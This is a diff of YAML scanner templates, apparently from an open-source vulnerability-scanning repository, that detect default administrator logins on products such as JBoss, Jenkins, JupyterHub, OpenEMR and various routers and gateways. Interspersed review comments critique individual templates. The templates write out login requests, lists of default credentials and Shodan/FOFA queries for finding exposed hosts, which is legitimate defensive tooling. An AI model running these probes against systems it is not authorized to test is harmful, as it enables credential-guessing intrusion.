https://www.ibm.com/docs/en/power-sys-solutions/0008-ESS?topic=5148-starting-elastic-storage-server-management-server-gui + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cwe-id: CWE-522 + tags: default-login,ibm,storage requests: - raw: @@ -40,3 +47,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2022/03/10 diff --git a/default-logins/idemia/idemia-biometrics-default-login.yaml b/default-logins/idemia/idemia-biometrics-default-login.yaml index 959da5926b..19d99e5196 100644 
--- a/default-logins/idemia/idemia-biometrics-default-login.yaml +++ b/default-logins/idemia/idemia-biometrics-default-login.yaml @@ -3,9 +3,14 @@ id: idemia-biometrics-default-login info: name: IDEMIA BIOMetrics Default Login author: Techryptic (@Tech) - severity: high - description: Default Login of password=12345 on IDEMIA BIOMetrics application. - reference: https://www.google.com/search?q=idemia+password%3D+"12345" + severity: medium + description: IDEMIA BIOMetrics application default login credentials were discovered. + reference: + - https://www.google.com/search?q=idemia+password%3D+"12345" + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N + cvss-score: 5.8 + cwe-id: CWE-522 tags: idemia,biometrics,default-login requests: @@ -36,4 +41,6 @@ requests: - type: status status: - - 200 \ No newline at end of file + - 200 + +# Enhanced by mp on 2022/03/10 diff --git a/default-logins/iptime/iptime-default-login.yaml b/default-logins/iptime/iptime-default-login.yaml index d6a42f5490..0f53e1f827 100644 --- a/default-logins/iptime/iptime-default-login.yaml +++ b/default-logins/iptime/iptime-default-login.yaml @@ -4,6 +4,13 @@ info: name: ipTIME Default Login author: gy741 severity: high + description: ipTIME default admin credentials were discovered. + reference: + - https://www.freewebtools.com/IPTIME/ + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cwe-id: CWE-522 tags: iptime,default-login requests: @@ -35,3 +42,5 @@ requests: - "login.cgi" part: body condition: and + +# Enhanced by mp on 2022/03/10 diff --git a/default-logins/jboss/jmx-default-login.yaml b/default-logins/jboss/jmx-default-login.yaml new file mode 100644 index 0000000000..43a786abca --- /dev/null +++ b/default-logins/jboss/jmx-default-login.yaml 
@@ -0,0 +1,47 @@ +id: jmx-default-login + +info: + name: JBoss JMX Console Weak Credential Discovery + author: paradessia + severity: high + description: JBoss JMX Console default login information was discovered. + reference: + - https://docs.jboss.org/jbossas/6/Admin_Console_Guide/en-US/html/Administration_Console_User_Guide-Accessing_the_Console.html + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cwe-id: CWE-522 + tags: jboss,jmx,default-login + +requests: + - raw: + - | + GET /jmx-console/ HTTP/1.1 + Host: {{Hostname}} + Authorization: Basic {{base64(user + ':' + pass)}} + + attack: clusterbomb + payloads: + user: + - admin + - root + pass: + - admin + - 12345 + - 123456 + - 1234 + - 123456789 + - 123qwe + - root + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - 'JMImplementation' + +# Enhanced by mp on 2022/03/10 diff --git a/default-logins/jenkins/jenkins-default.yaml b/default-logins/jenkins/jenkins-default.yaml index 2f2d3c8ef9..6409e052da 100644 --- a/default-logins/jenkins/jenkins-default.yaml +++ b/default-logins/jenkins/jenkins-default.yaml 
@@ -1,51 +1,40 @@ id: jenkins-weak-password info: - name: Jenkins Weak Password + name: Jenkins Default Login author: Zandros0 severity: high + description: Jenkins default admin login information was discovered. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cwe-id: CWE-522 tags: jenkins,default-login requests: - raw: - | - GET /login HTTP/1.1 + GET / HTTP/1.1 Host: {{Hostname}} - | POST /j_spring_security_check HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded - Cookie: {{cookie}} - j_username={{username}}&j_password={{password}}&from=%2F&Submit=Sign+in + j_username=admin&j_password=admin&from=%2F&Submit=Sign+in - | GET / HTTP/1.1 Host: {{Hostname}} - Cookie: {{cookie}} - - attack: pitchfork - payloads: - username: - - admin - - jenkins - password: - - admin - - password - - extractors: - - type: regex - name: cookie - internal: true - part: header - regex: - - 'JSESSIONID\..*=([a-z0-9.]+)' + cookie-reuse: true req-condition: true matchers: - type: dsl - condition: and dsl: - 'contains(body_3, "/logout")' - 'contains(body_3, "Dashboard [Jenkins]")' + condition: and + +# Enhanced by mp on 2022/03/10 diff --git a/default-logins/jinher-oa-default-login.yaml b/default-logins/jinher-oa-default-login.yaml new file mode 100644 index 0000000000..7c604317dc --- /dev/null +++ b/default-logins/jinher-oa-default-login.yaml 
@@ -0,0 +1,44 @@ +id: jinher-oa-default-login + +info: + name: Jinher oa C6 Default Password + author: ritikchaddha + severity: high + description: Jinher-OA C6 default administrator account credential. + reference: + - https://github.com/nu0l/poc-wiki/blob/main/%E9%87%91%E5%92%8COA-C6-default-password.md + tags: jinher,default-login + +requests: + - raw: + - | + POST /c6/Jhsoft.Web.login/AjaxForLogin.aspx HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + type=login&loginCode={{base64("{{username}}")}}&pwd={{base64("{{password}}")}}& + + attack: pitchfork + payloads: + username: + - admin + password: + - "000000" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "\xcf\xb5\xcd\xb3\xb9\xdc\xc0\xed\xd4\xb1\x7c" + - "\xc4\xfa\xba\xc3\x7c\x7c\x7c" + condition: and + + - type: word + part: header + words: + - "SessionIDAdmin=" + + - type: status + status: + - 200 diff --git a/default-logins/jupyterhub/jupyterhub-default-login.yaml b/default-logins/jupyterhub/jupyterhub-default-login.yaml new file mode 100644 index 0000000000..fa7f7c44b0 --- /dev/null +++ b/default-logins/jupyterhub/jupyterhub-default-login.yaml @@ -0,0 +1,41 @@ +id: jupyterhub-default-login + +info: + name: Jupyterhub Default Login + author: For3stCo1d + severity: high + reference: + - https://github.com/jupyterhub/jupyterhub + metadata: + shodan-query: http.title:"JupyterHub" + tags: jupyterhub,default-login + +requests: + - raw: + - | + POST /hub/login?next= HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + username={{user}}&password={{pass}} + + attack: pitchfork + payloads: + user: + - admin + - jovyan + pass: + - admin + - jupyter + + matchers-condition: and + matchers: + - type: dsl + dsl: + - contains(tolower(all_headers), 'jupyterhub-session-id=') + - contains(tolower(all_headers), 'jupyterhub-hub-login=') + condition: and + + - type: status + status: + - 302 \ No newline at end of file 
diff --git a/default-logins/mantisbt/mantisbt-default-credential.yaml b/default-logins/mantisbt/mantisbt-default-credential.yaml new file mode 100644 index 0000000000..17ceea9753 --- /dev/null +++ b/default-logins/mantisbt/mantisbt-default-credential.yaml @@ -0,0 +1,46 @@ +id: mantisbt-default-credential + +info: + name: MantisBT Default Admin Login + author: For3stCo1d + severity: high + description: A MantisBT default admin login was discovered. + reference: + - https://mantisbt.org/ + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cwe-id: CWE-522 + metadata: + shodan-query: title:"MantisBT" + tags: mantisbt,default-login + +requests: + - raw: + - | + POST /login.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + return=index.php&username={{user}}&password={{pass}} + + attack: pitchfork + payloads: + user: + - administrator + pass: + - root + + matchers-condition: and + matchers: + - type: dsl + dsl: + - contains(tolower(all_headers), 'mantis_secure_session') + - contains(tolower(all_headers), 'mantis_string_cookie') + condition: and + + - type: status + status: + - 302 + +# Enhanced by mp on 2022/03/22 diff --git a/default-logins/minio/minio-default-login.yaml b/default-logins/minio/minio-default-login.yaml index d9338fbaf2..9dce961de7 100644 --- a/default-logins/minio/minio-default-login.yaml +++ b/default-logins/minio/minio-default-login.yaml @@ -4,6 +4,13 @@ info: name: Minio Default Login author: pikpikcu severity: medium + description: Minio default admin credentials were discovered. + reference: + - https://docs.min.io/docs/minio-quickstart-guide.html# + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cwe-id: CWE-522 tags: default-login,minio requests: @@ -40,3 +47,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2022/03/10 
diff --git a/default-logins/mofi/mofi4500-default-login.yaml b/default-logins/mofi/mofi4500-default-login.yaml new file mode 100644 index 0000000000..a161c4adf5 --- /dev/null +++ b/default-logins/mofi/mofi4500-default-login.yaml @@ -0,0 +1,42 @@ +id: mofi4500-default-login + +info: + name: MOFI4500-4GXeLTE-V2 Default Login + author: pikpikcu + severity: high + description: Mofi Network MOFI4500-4GXELTE wireless router default admin credentials were discovered. + reference: + - https://www.cleancss.com/router-default/Mofi_Network/MOFI4500-4GXELTE + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cwe-id: CWE-522 + tags: mofi,default-login + +requests: + - raw: + - | + POST /cgi-bin/luci/ HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + username=root&password=admin + + attack: pitchfork + payloads: + username: + - root + password: + - admin + + matchers-condition: and + matchers: + - type: word + words: + - "MOFI4500 - General - LuCI" + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/03/10 diff --git a/default-logins/nagios/nagios-default-login.yaml b/default-logins/nagios/nagios-default-login.yaml index 8fb3713825..3672516797 100644 --- a/default-logins/nagios/nagios-default-login.yaml +++ b/default-logins/nagios/nagios-default-login.yaml @@ -1,10 +1,18 @@ id: nagios-default-login + info: name: Nagios Default Login author: iamthefrogy severity: high + description: Nagios default admin credentials were discovered. + reference: + - https://www.nagios.org + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cwe-id: CWE-522 tags: nagios,default-login - reference: https://www.nagios.org + requests: - raw: - | @@ -32,3 +40,5 @@ requests: - 'Current Status' - 'Reports' condition: and + +# Enhanced by mp on 2022/03/10 
diff --git a/default-logins/netsus/netsus-default-login.yaml b/default-logins/netsus/netsus-default-login.yaml new file mode 100644 index 0000000000..1265d06a54 --- /dev/null +++ b/default-logins/netsus/netsus-default-login.yaml @@ -0,0 +1,44 @@ +id: netsus-default-login + +info: + name: NetSUS Server Default Login + author: princechaddha + severity: high + description: NetSUS Server default admin credentials were discovered. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cwe-id: CWE-522 + metadata: + shodan-query: http.title:"NetSUS Server Login" + tags: netsus,default-login + +requests: + - raw: + - | + POST /webadmin/index.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + loginwith=suslogin&username={{username}}&password={{password}}&submit= + attack: pitchfork + payloads: + username: + - webadmin + password: + - webadmin + + matchers-condition: and + matchers: + - type: word + part: header + words: + - 'Location: dashboard.php' + - 'PHPSESSID=' + condition: and + + - type: status + status: + - 302 + +# Enhanced by mp on 2022/03/10 diff --git a/default-logins/nexus/nexus-default-login.yaml b/default-logins/nexus/nexus-default-login.yaml index 4decf4e751..e05220ce09 100644 --- a/default-logins/nexus/nexus-default-login.yaml +++ b/default-logins/nexus/nexus-default-login.yaml @@ -4,6 +4,11 @@ info: name: Nexus Default Login author: pikpikcu severity: high + description: Nexus default admin credentials were discovered. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cwe-id: CWE-522 tags: nexus,default-login requests: @@ -34,3 +39,5 @@ requests: - "NXSESSIONID" part: header condition: and + +# Enhanced by mp on 2022/03/10 diff --git a/default-logins/nps/nps-default-login.yaml b/default-logins/nps/nps-default-login.yaml index 5768136961..9de4824223 100644 --- a/default-logins/nps/nps-default-login.yaml 
+++ b/default-logins/nps/nps-default-login.yaml @@ -4,6 +4,13 @@ info: name: NPS Default Login author: pikpikcu severity: high + description: NPS default admin credentials were discovered. + reference: + - https://docs.microfocus.com/NNMi/10.30/Content/Administer/Hardening/confCC2b_pwd.htm + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cwe-id: CWE-522 tags: nps,default-login requests: @@ -39,3 +46,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2022/03/10 diff --git a/default-logins/octobercms-default-login.yaml b/default-logins/octobercms-default-login.yaml new file mode 100644 index 0000000000..ac7530cfa6 --- /dev/null +++ b/default-logins/octobercms-default-login.yaml @@ -0,0 +1,60 @@ +id: octobercms-default-login + +info: + name: OctoberCMS Default Login + author: princechaddha + severity: high + description: OctoberCMS default administrator account credential. + reference: + - https://github.com/octobercms/october + - https://octobercms.com/ + metadata: + verified: true + shodan-query: http.component:"October CMS" + tags: octobercms,default-login,oss + +requests: + - raw: + - | + GET /backend/backend/auth/signin HTTP/1.1 + Host: {{Hostname}} + Origin: {{BaseURL}} + + - | + POST /backend/backend/auth/signin HTTP/1.1 + Host: {{Hostname}} + Origin: {{BaseURL}} + Content-Type: application/x-www-form-urlencoded + + _token={{token}}&postback=1&login={{username}}&password={{password}} + + cookie-reuse: true + attack: clusterbomb + payloads: + username: + - admin + password: + - admin + - "" + + matchers-condition: and + matchers: + - type: word + part: header + words: + - "october_session=" + - "admin_auth=" + condition: and + + - type: status + status: + - 302 + + extractors: + - type: regex + part: body + name: token + internal: true + group: 1 + regex: + - 'meta name="csrf\-token" content="([A-Za-z0-9]+)">' 
diff --git a/default-logins/ofbiz/ofbiz-default-login.yaml b/default-logins/ofbiz/ofbiz-default-login.yaml index 4471e1295a..11a9d6b80f 100644 --- a/default-logins/ofbiz/ofbiz-default-login.yaml +++ b/default-logins/ofbiz/ofbiz-default-login.yaml @@ -4,7 +4,14 @@ info: name: Apache OfBiz Default Login author: pdteam severity: medium - tags: ofbiz,default-login + description: Apache OfBiz default admin credentials were discovered. + reference: + - https://cwiki.apache.org/confluence/display/OFBIZ/Apache+OFBiz+Technical+Production+Setup+Guide + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cwe-id: CWE-522 + tags: ofbiz,default-login,apache requests: - raw: @@ -27,4 +34,6 @@ requests: words: - "ofbiz-pagination-template" - "Powered by OFBiz" - condition: and \ No newline at end of file + condition: and + +# Enhanced by mp on 2022/03/10 diff --git a/default-logins/openemr/openemr-default-login.yaml b/default-logins/openemr/openemr-default-login.yaml new file mode 100644 index 0000000000..5a08aa24f2 --- /dev/null +++ b/default-logins/openemr/openemr-default-login.yaml 
@@ -0,0 +1,46 @@ +id: openemr-default-login + +info: + name: OpenEMR Default Login + author: Geekby + description: OpenEMR default login was discovered. + severity: high + reference: + - https://github.com/openemr/openemr-devops/tree/master/docker/openemr/6.1.0/#openemr-official-docker-image + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cwe-id: CWE-522 + metadata: + fofa-query: app="OpenEMR" + shodan-query: http.html:"OpenEMR" + tags: openemr,default-login + +requests: + - raw: + - | + POST /interface/main/main_screen.php?auth=login&site=default HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + new_login_session_management=1&languageChoice=1&authUser={{user}}&clearPass={{pass}}&languageChoice=10 + + attack: pitchfork + payloads: + user: + - admin + pass: + - pass + + matchers-condition: and + matchers: + - type: word + part: header + words: + - "main.php?token_main=" + - "OpenEMR" + condition: and + + - type: status + status: + - 302 diff --git a/default-logins/openwrt/openwrt-default-login.yaml b/default-logins/openwrt/openwrt-default-login.yaml new file mode 100644 index 0000000000..a9e9dce71d --- /dev/null +++ b/default-logins/openwrt/openwrt-default-login.yaml @@ -0,0 +1,21 @@ +id: openwrt-default-login + +info: + name: Opentwrt Default Login + author: For3stCo1d + severity: high + reference: + - https://forum.archive.openwrt.org/viewtopic.php?id=16611 + metadata: + shodan-query: http.title:"OpenWrt - LuCI" + tags: openwrt,default-login + +requests: + - method: GET + path: + - "{{BaseURL}}/cgi-bin/luci" + + matchers: + - type: word + words: + - 'cgi-bin/luci/admin/system/admin' \ No newline at end of file diff --git a/default-logins/oracle/businessintelligence-default-login.yaml b/default-logins/oracle/businessintelligence-default-login.yaml index a89df1808c..8095ceae03 100644 --- a/default-logins/oracle/businessintelligence-default-login.yaml 
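Review bot: The openwrt template never submits credentials — it issues one unauthenticated `GET /cgi-bin/luci` and matches the `cgi-bin/luci/admin/system/admin` link in the body — so a hit means the LuCI admin pages render without any login (typically no root password set), not that a default username/password pair was accepted, and `name`/`description` should say exactly that rather than "Default Login". Suggested `name: OpenWrt LuCI Unauthenticated Admin Access` (which also fixes the `Opentwrt` typo) plus a one-line `description:` stating that a match indicates the admin UI is reachable without authentication. The lone word matcher has no status check, so an error or redirect body that mentions the path would also match; add `matchers-condition: and` with `- type: status` / `status:` / `- 200`. The file is also missing its trailing newline.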
+++ b/default-logins/oracle/businessintelligence-default-login.yaml @@ -4,6 +4,13 @@ info: name: Oracle Business Intelligence Default Login author: milo2012 severity: high + description: Oracle Business Intelligence default admin credentials were discovered. + reference: + - https://docs.oracle.com/cd/E12096_01/books/AnyDeploy/AnyDeployMisc2.html + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cwe-id: CWE-522 tags: oracle,default-login requests: @@ -43,3 +50,5 @@ requests: words: - 'createSessionReturn' part: body + +# Enhanced by mp on 2022/03/10 diff --git a/default-logins/others/inspur-clusterengine-default-login.yaml b/default-logins/others/inspur-clusterengine-default-login.yaml new file mode 100644 index 0000000000..bbda3dd5e1 --- /dev/null +++ b/default-logins/others/inspur-clusterengine-default-login.yaml @@ -0,0 +1,45 @@ +id: inspur-clusterengine-default-login + +info: + name: Inspur Clusterengine V4 Default Login + author: ritikchaddha + severity: high + reference: + - https://blog.csdn.net/qq_36197704/article/details/115665793 + metadata: + fofa-query: title="TSCEV4.0" + tags: inspur,clusterengine,default-login + +requests: + - raw: + - | + POST /login HTTP/1.1 + Host: {{Hostname}} + + op=login&username={{username}}&password={{password}} + + attack: pitchfork + payloads: + username: + - admin|pwd + password: + - 123456 + + redirects: true + max-redirects: 2 + matchers-condition: and + matchers: + - type: word + part: body + words: + - '"exitcode":0' + + - type: word + part: header + words: + - "username=admin|pwd" + condition: and + + - type: status + status: + - 200 diff --git a/default-logins/others/kingsoft-v8-default-login.yaml b/default-logins/others/kingsoft-v8-default-login.yaml new file mode 100644 index 0000000000..65324337cd --- /dev/null +++ b/default-logins/others/kingsoft-v8-default-login.yaml 
@@ -0,0 +1,38 @@ +id: kingsoft-v8-default-login + +info: + name: Kingsoft V8 Default Login + author: ritikchaddha + severity: medium + reference: + - https://idc.wanyunshuju.com/aqld/2123.html + tags: kingsoft,default-login + +requests: + - raw: + - | + POST /inter/ajax.php?cmd=get_user_login_cmd HTTP/1.1 + Host: {{Hostname}} + + {"get_user_login_cmd":{"name":"{{username}}","password":"{{md5("{{password}}")}}"}} + + attack: pitchfork + payloads: + username: + - admin + password: + - admin + redirects: true + max-redirects: 2 + matchers-condition: and + matchers: + - type: word + part: body + words: + - "ADMIN" + - "userSession" + condition: and + + - type: status + status: + - 200 diff --git a/default-logins/others/panabit-ixcache-default-login.yaml b/default-logins/others/panabit-ixcache-default-login.yaml new file mode 100644 index 0000000000..6ca7af1572 --- /dev/null +++ b/default-logins/others/panabit-ixcache-default-login.yaml @@ -0,0 +1,36 @@ +id: panabit-ixcache-default-login + +info: + name: Panabit iXCache Default Login + author: ritikchaddha + severity: high + reference: + - http://forum.panabit.com/thread-10830-1-1.html + tags: ixcache,default-login,panabit + +requests: + - raw: + - | + POST /login/userverify.cgi HTTP/1.1 + Host: {{Hostname}} + + username={{username}}&password={{password}} + + payloads: + username: + - admin + password: + - ixcache + attack: pitchfork + + matchers-condition: and + matchers: + + - type: word + part: body + words: + - "URL=/cgi-bin/monitor.cgi" + + - type: status + status: + - 200 diff --git a/default-logins/others/secnet-ac-default-login.yaml b/default-logins/others/secnet-ac-default-login.yaml new file mode 100644 index 0000000000..685125e478 --- /dev/null +++ b/default-logins/others/secnet-ac-default-login.yaml 
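Review bot: The kingsoft POST body hashes the password as `{{md5("{{password}}")}}`, nesting a template variable inside the DSL call, while the sequoiadb template in this same change uses the plain `{{md5(password)}}` form; the two should be unified, and the unnested form appears not to depend on two rounds of substitution. Suggested body line: `{"get_user_login_cmd":{"name":"{{username}}","password":"{{md5(password)}}"}}`. `redirects: true` / `max-redirects: 2` on a JSON login endpoint also means the `ADMIN`/`userSession` body matcher may be evaluated against a redirect target instead of the login response; drop the redirect keys unless the endpoint is known to redirect on success.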
@@ -0,0 +1,42 @@ +id: secnet-ac-default-password + +info: + name: secnet-ac-default-password + author: ritikchaddha + severity: high + description: secnet ac default admin credentials were discovered. + reference: + - https://bbs.secnet.cn/post/t-30 + tags: secnet,default-login + +requests: + - raw: + - | + POST /login.cgi HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + user={{username}}&password={{password}} + + attack: pitchfork + payloads: + username: + - admin + password: + - admin + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "window.open('index.htm" + + - type: word + part: header + words: + - "ac_userid={{username}},ac_passwd=" + + - type: status + status: + - 200 diff --git a/default-logins/others/telecom-gateway-default-login.yaml b/default-logins/others/telecom-gateway-default-login.yaml new file mode 100644 index 0000000000..08f2ecd266 --- /dev/null +++ b/default-logins/others/telecom-gateway-default-login.yaml @@ -0,0 +1,37 @@ +id: telecom-gateway-default-login + +info: + name: Telecom Gateway Default Login + author: ritikchaddha + severity: high + tags: telecom,default-login,gateway + +requests: + - raw: + - | + POST /manager/login.php HTTP/1.1 + Host: {{Hostname}} + + Name={{username}}&Pass={{password}} + + attack: pitchfork + payloads: + username: + - admin + password: + - admin + redirects: true + max-redirects: 2 + matchers-condition: and + matchers: + - type: word + part: body + words: + - "电信网关服务器管理后台" + - "index-shang.php" + - "di.php" + condition: and + + - type: status + status: + - 200 diff --git a/default-logins/paloalto/panos-default-login.yaml b/default-logins/paloalto/panos-default-login.yaml index 2e218f2bc2..be0806c0be 100644 --- a/default-logins/paloalto/panos-default-login.yaml +++ b/default-logins/paloalto/panos-default-login.yaml 
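Review bot: The secnet template's `id: secnet-ac-default-password` does not match its file name `secnet-ac-default-login.yaml`, and `name: secnet-ac-default-password` repeats the id instead of a human-readable title; every other template in this change follows id == file basename and `name: <Product> Default Login`. Suggested: `id: secnet-ac-default-login` and `name: Secnet AC Default Login`. The header matcher `ac_userid={{username}},ac_passwd=` suggests the appliance echoes the username and password into a cookie; if that is confirmed, it deserves a sentence in `description` since it is a finding in its own right.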
@@ -4,8 +4,13 @@ info: name: Palo Alto Networks PAN-OS Default Login author: Techryptic (@Tech) severity: high - description: Default Login of admin:admin on Palo Alto Networks PAN-OS application. - reference: https://docs.paloaltonetworks.com/pan-os/8-1/pan-os-admin/getting-started/integrate-the-firewall-into-your-management-network/perform-initial-configuration.html#:~:text=By%20default%2C%20the%20firewall%20has,with%20other%20firewall%20configuration%20tasks. + description: Palo Alto Networks PAN-OS application default admin credentials were discovered. + reference: + - https://docs.paloaltonetworks.com/pan-os/8-1/pan-os-admin/getting-started/integrate-the-firewall-into-your-management-network/perform-initial-configuration.html#:~:text=By%20default%2C%20the%20firewall%20has,with%20other%20firewall%20configuration%20tasks. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cwe-id: CWE-522 tags: panos,default-login requests: @@ -37,4 +42,6 @@ requests: - type: status status: - - 200 \ No newline at end of file + - 200 + +# Enhanced by mp on 2022/03/10 diff --git a/default-logins/panabit/panabit-default-login.yaml b/default-logins/panabit/panabit-default-login.yaml index d790a10942..41b1eb6bb4 100644 --- a/default-logins/panabit/panabit-default-login.yaml +++ b/default-logins/panabit/panabit-default-login.yaml 
@@ -2,9 +2,19 @@ id: panabit-default-login info: name: Panabit Gateway Default Login - author: pikpikcu + author: pikpikcu,ritikchaddha severity: high - reference: https://max.book118.com/html/2017/0623/117514590.shtm + description: Panabit Gateway default credentials were discovered. + reference: + - https://max.book118.com/html/2017/0623/117514590.shtm + - https://en.panabit.com/wp-content/uploads/Panabit-Intelligent-Application-Gateway-04072020.pdf + - https://topic.alibabacloud.com/a/panabit-monitoring-installation-tutorial_8_8_20054193.html + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N + cvss-score: 5.8 + cwe-id: CWE-522 + metadata: + fofa-query: app="Panabit-智能网关" tags: panabit,default-login requests: @@ -19,31 +29,38 @@ requests: Accept-Language: en-GB,en-US;q=0.9,en;q=0.8 ------WebKitFormBoundaryAjZMsILtbrBp8VbC - Content-Disposition: form-data; name="{{username}}" + Content-Disposition: form-data; name="username" - admin + {{username}} ------WebKitFormBoundaryAjZMsILtbrBp8VbC - Content-Disposition: form-data; name="{{password}}" + Content-Disposition: form-data; name="password" - panabit + {{password}} ------WebKitFormBoundaryAjZMsILtbrBp8VbC-- payloads: username: - - username + - admin password: - - password + - panabit attack: pitchfork matchers-condition: and matchers: - type: word + part: body words: - '' - 'urn:schemas-microsoft-com:vml' - part: body condition: and + - type: word + part: header + words: + - "paonline_admin" + - type: status status: - 200 + +# Enhanced by mp on 2022/03/10 diff --git a/default-logins/pentaho/pentaho-default-login.yaml b/default-logins/pentaho/pentaho-default-login.yaml index a91dfc9bd8..e4ba5681b5 100644 --- a/default-logins/pentaho/pentaho-default-login.yaml +++ b/default-logins/pentaho/pentaho-default-login.yaml 
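Review bot: The `classification` added to panabit-default-login scores the issue `cvss-score: 5.8` with an `I:N/A:N` vector, yet `severity: high` is retained; in this same change the other 5.8 / `I:N/A:N` templates (showdoc, szhe, vidyo) are all `severity: medium`, and the ones kept at `high` use 8.3 / `I:L/A:L`. Either the severity or the vector is wrong — a default admin credential on a gateway normally carries integrity impact, so `cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L` and `cvss-score: 8.3` look like the intended values. The multipart change in the same hunk is a genuine fix (the field names were previously interpolated from the payload), so the template was not sending `username`/`password` fields at all before this commit.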
@@ -1,38 +1,47 @@ -id: pentaho-default-login - -info: - name: Pentaho Default Login - author: pussycat0x - severity: high - metadata: - shodan-query: pentaho - tags: pentaho,default-login - -requests: - - raw: - - | - POST /pentaho/j_spring_security_check HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded; charset=UTF-8 - - j_username={{user}}&j_password={{pass}} - - attack: pitchfork - payloads: - user: - - admin - pass: - - password - - matchers-condition: and - matchers: - - type: word - part: header - words: - - 'pentaho/Home' - - 'JSESSIONID=' - condition: and - - - type: status - status: - - 302 +id: pentaho-default-login + +info: + name: Pentaho Default Login + author: pussycat0x + severity: high + description: Pentaho default admin credentials were discovered. + reference: + - https://www.hitachivantara.com/en-us/pdfd/training/pentaho-lesson-1-user-console-overview.pdf + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cwe-id: CWE-522 + metadata: + shodan-query: pentaho + tags: pentaho,default-login + +requests: + - raw: + - | + POST /pentaho/j_spring_security_check HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded; charset=UTF-8 + + j_username={{user}}&j_password={{pass}} + + attack: pitchfork + payloads: + user: + - admin + pass: + - password + + matchers-condition: and + matchers: + - type: word + part: header + words: + - 'pentaho/Home' + - 'JSESSIONID=' + condition: and + + - type: status + status: + - 302 + +# Enhanced by mp on 2022/03/10 diff --git a/default-logins/rabbitmq/rabbitmq-default-login.yaml b/default-logins/rabbitmq/rabbitmq-default-login.yaml index 4497061308..001085654d 100644 --- a/default-logins/rabbitmq/rabbitmq-default-login.yaml +++ b/default-logins/rabbitmq/rabbitmq-default-login.yaml 
@@ -1,9 +1,16 @@ id: rabbitmq-default-login info: - name: RabbitMQ admin Default Login + name: RabbitMQ Default Login author: fyoorer,dwisiswant0 severity: high + description: RabbitMQ default admin credentials were discovered. + reference: + - https://onlinehelp.coveo.com/en/ces/7.0/administrator/changing_the_rabbitmq_administrator_password.htm + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cwe-id: CWE-522 tags: rabbitmq,default-login requests: @@ -34,3 +41,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2022/03/10 diff --git a/default-logins/rainloop/rainloop-default-login.yaml b/default-logins/rainloop/rainloop-default-login.yaml new file mode 100644 index 0000000000..ad0cf18a01 --- /dev/null +++ b/default-logins/rainloop/rainloop-default-login.yaml @@ -0,0 +1,53 @@ +id: rainloop-default-login + +info: + name: Rainloop WebMail Default Login + author: For3stCo1d + severity: high + reference: + - https://github.com/RainLoop/rainloop-webmail/issues/28 + metadata: + fofa-query: app="RAINLOOP-WebMail" + tags: rainloop,webmail,default-login,foss + +requests: + - raw: + - | # Login Portal: /?admin + GET /?/AdminAppData@no-mobile-0/0/15503332983847185/ HTTP/1.1 + Host: {{Hostname}} + + - | + POST /?/Ajax/&q[]=/0/ HTTP/2 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded; charset=UTF-8 + + 